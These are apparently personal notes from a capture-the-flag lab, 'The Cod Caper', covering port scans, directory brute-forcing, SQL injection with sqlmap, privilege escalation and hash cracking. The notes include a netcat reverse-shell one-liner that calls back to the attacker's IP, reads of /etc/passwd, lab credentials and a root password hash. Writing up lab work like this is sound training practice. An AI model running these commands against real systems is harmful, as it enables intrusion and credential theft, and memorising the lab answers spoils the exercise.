# The Cod Caper

> Shay Pasvolsky
> Started: 02/10/20 10-49-16
> Finished:

---

---

## General info

```bash
export MIP=10.10.83.27
export MyIP=10.9.134.47
```

### Users

```txt
    User:
        Password:
```

### Open Ports

```txt
    port: 22
        type: tcp
        service: OpenSSH
            version: 7.2p2
            Has Vuln: Many

    port: 80
        type: tcp
        service: Apache httpd
            version: 2.4.18
            Has Vuln: Many
```

### Tools

```txt
    - sqlmap
    - pwntools
```

### Sites

```txt
    - [https://highon.coffee/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
    - [http://pentestmonkey.net/](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
```

---

## Tasks

### Task 1

1. Help me out! :)

    ```txt
    Hit 'Completed'
    ```

### Task 2

1. How many ports are open on the target machine?

    ```bash
    sudo nmap -sC -sV -vvv --script vuln $MIP -oN scans/local/nmap/standart-w.vuln && sudo nmap -sC -sV -vvv -p- $MIP -oN scans/local/nmap/allports && sudo nmap -sC -sV -vvv -A $MIP -oN scans/local/nmap/agrasiv
    ```

    ```txt
    2
    ```

2. What is the http-title of the web server?

    ```keyboard-firefox
    "ctrl+u" in firefox
    find the "<title>" tag
    ```

    ```txt
    Apache2 Ubuntu Default Page: It works
    ```

3. What version is the ssh service?

    ```txt
    OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
    ```

4. What is the version of the web server?

    ```txt
    Apache/2.4.18
    ```

### Task 3

1. What is the name of the important file on the server?

    ```bash
    sudo gobuster dir -u http://10.10.83.27 -o scans/local/gobuster/dirs -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100 &&
    sudo gobuster dir -u http://10.10.83.27 -o scans/local/gobuster/files -x "php,html,txt" -w /usr/share/wordlists/rockyou.txt -t 100 &&
    sudo gobuster dir -u http://10.10.83.27 -o scans/local/gobuster/files-secbig -x "php,html,txt" -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -t 100
    ```

    ```txt
    administrator.php
    ```

### Task 4

1. What is the admin username?

    ```bash
    too long time: sqlmap -u "http://10.10.83.27/administrator.php" --forms --dump-all -a | tee scans/local/sqlmap/autoformfill

    sqlmap -u "http://10.10.83.27/administrator.php" --forms --dump-all | tee scans/local/sqlmap/autoformfill2

    cp -r /home/shay/.local/share/sqlmap/output/* ./scans/local/sqlmap/
    ```

    ```txt
    pingudad
    ```

2. What is the admin password?

    ```txt
    secretpass
    ```

3. How many forms of SQLI is the form vulnerable to?

    ```txt
    3
    ```

### Task 5

1. How many files are in the current directory?

    ```command
    ls -al
    ```

    ```txt
    3
    ```

2. Do I still have an account?

    ```command
    cat /etc/passwd
    ```

    ```txt
    yes
    ```

3. What is my ssh password?

    ```command
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.134.47 9999 >/tmp/f
    find / -user pingu -type f 2>/dev/null -> no luck
    find / 2>/dev/null | grep pass -> gave /var/hidden/pass
    cat /var/hidden/pass
    ```

    ```txt
    pinguapingu
    ```

### Task 6

1. What is the interesting path of the interesting suid file

    ```txt
    run linpeas on the target
    ```

    ```txt
    /opt/secret/root
    ```

### Task 7

1. Read the above :)

    ```txt
    Hit 'Completed'
    ```

### Task 8

1. Woohoo!

    ```txt
    Hit 'Completed'
    ```

### Task 9

1. Even more woohoo!

    ```txt
    Hit 'Completed'
    ```

### Task 10

1. What is the root password!

    ```info
    run the script provided

    hsah is "$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck."
    ```

    ```txt
    love2fish
    ```

### Task 11

1. You helped me out! 

    ```txt
    Hit 'Completed'
    ```
